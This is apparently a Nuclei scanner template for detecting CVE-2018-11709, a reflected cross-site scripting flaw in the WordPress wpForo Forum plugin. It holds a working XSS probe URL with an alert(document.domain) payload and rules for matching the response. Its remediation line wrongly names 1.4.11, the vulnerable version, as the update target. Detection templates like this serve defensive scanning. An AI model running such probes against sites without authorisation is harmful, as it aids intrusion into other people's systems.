52 lines
1.7 KiB
YAML
52 lines
1.7 KiB
YAML
id: CVE-2018-11709
|
|
|
|
info:
|
|
name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.
|
|
remediation: |
|
|
Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-11709
|
|
- https://wordpress.org/plugins/wpforo/#developers
|
|
- https://wpvulndb.com/vulnerabilities/9090
|
|
- https://blog.dewhurstsecurity.com/2018/06/01/wp-foro-wordpress-plugin-xss-vulnerability.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2018-11709
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00151
|
|
epss-percentile: 0.51145
|
|
cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: gvectors
|
|
product: wpforo_forum
|
|
framework: wordpress
|
|
tags: cve,cve2018,wordpress,xss,wp-plugin
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100f86121560e82ac19b4d9a26cc10ed13e9d1de36cbb1eccdffac826e8ae2efba902200ce11cad459205a5aa35c94bd42e4715c396bc28dd119261668c06e2c8582f54:922c64590222798bb761d5b6d8e72950
|